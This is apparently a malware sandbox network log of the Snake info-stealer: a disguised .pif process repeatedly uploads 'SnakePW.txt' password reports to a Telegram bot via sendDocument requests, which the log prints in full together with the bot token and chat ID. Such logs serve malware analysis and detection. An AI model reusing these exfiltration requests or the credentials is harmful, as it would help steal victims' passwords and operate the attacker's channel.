2024-11-26 07:26:11 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388961,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605971,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.7 | 49936 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:10 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd10047244b21a
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:10 UTC | 537 | OUT | Data Ascii: --------------------------8dd10047244b21aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:26:11 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:11 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:11 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388962,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605971,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.7 | 49941 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:12 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f76f31b176f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:12 UTC | 537 | OUT | Data Ascii: --------------------------8dd0f76f31b176fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:26:13 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:13 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:13 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388965,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605973,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.7 | 49942 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:12 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f82c2b37b8e
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:12 UTC | 537 | OUT | Data Ascii: --------------------------8dd0f82c2b37b8eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:26:13 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:13 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:13 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388967,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605973,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.7 | 49943 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:12 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd101cbc07fa5f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:12 UTC | 537 | OUT | Data Ascii: --------------------------8dd101cbc07fa5fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:26:13 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:13 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:13 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388969,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605973,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.7 | 49948 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:14 UTC | 358 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f8fc54b4863
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
2024-11-26 07:26:14 UTC | 537 | OUT | Data Ascii: --------------------------8dd0f8fc54b4863Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:26:15 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:15 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:15 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388971,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605975,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.7 | 49949 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:14 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f9b66364c74
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:14 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0f9b66364c74Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:26:15 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:15 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:15 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388973,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605975,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.7 | 49950 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:14 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd1044355765bf
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:14 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd1044355765bfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:26:15 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:15 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:15 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388974,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605975,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.7 | 49954 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:16 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0fac6961b0ab
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:16 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0fac6961b0abContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:26:17 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:17 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:17 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388978,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605976,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.7 | 49956 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:16 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0fb53f2b9fbb
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:16 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0fb53f2b9fbbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:26:17 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:17 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:17 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388980,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605977,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.7 | 49958 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:16 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd106900031a3d
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:16 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd106900031a3dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:26:17 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:17 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:17 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388982,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605977,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.7 | 49962 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:18 UTC | 358 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0fc7a70b6000
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
2024-11-26 07:26:18 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0fc7a70b6000Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:26:19 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:18 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:19 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388984,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605978,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.7 | 49963 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:18 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0fd2dd57c60f
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:26:18 UTC | 537 | OUT | Data Ascii: --------------------------8dd0fd2dd57c60fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:26:19 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:26:19 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:19 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388986,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605979,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.7 | 49964 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:18 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd10968007cad7
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:26:18 UTC | 537 | OUT | Data Ascii: --------------------------8dd10968007cad7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:26:19 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:26:19 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:19 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388988,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605979,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.7 | 49970 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:20 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0fe7f7931677
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:26:20 UTC | 537 | OUT | Data Ascii: --------------------------8dd0fe7f7931677Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:26:21 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:26:20 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:21 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388990,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605980,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.7 | 49971 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:20 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd0ff1a9c0edb8
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:26:20 UTC | 537 | OUT | Data Ascii: --------------------------8dd0ff1a9c0edb8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:26:21 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:26:21 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:21 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388992,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605981,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.7 | 49972 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:21 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd10c1527eafe5
Host: api.telegram.org
Content-Length: 537
2024-11-26 07:26:21 UTC | 537 | OUT | Data Ascii: --------------------------8dd10c1527eafe5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:26:21 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:26:21 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:21 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388994,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605981,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.7 | 49978 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:22 UTC | 358 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1006e1e9399e
Host: api.telegram.org
Content-Length: 537
Connection: Keep-Alive
2024-11-26 07:26:22 UTC | 537 | OUT | Data Ascii: --------------------------8dd1006e1e9399eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:26:23 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 26 Nov 2024 07:26:22 GMT
Content-Type: application/json
Content-Length: 521
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
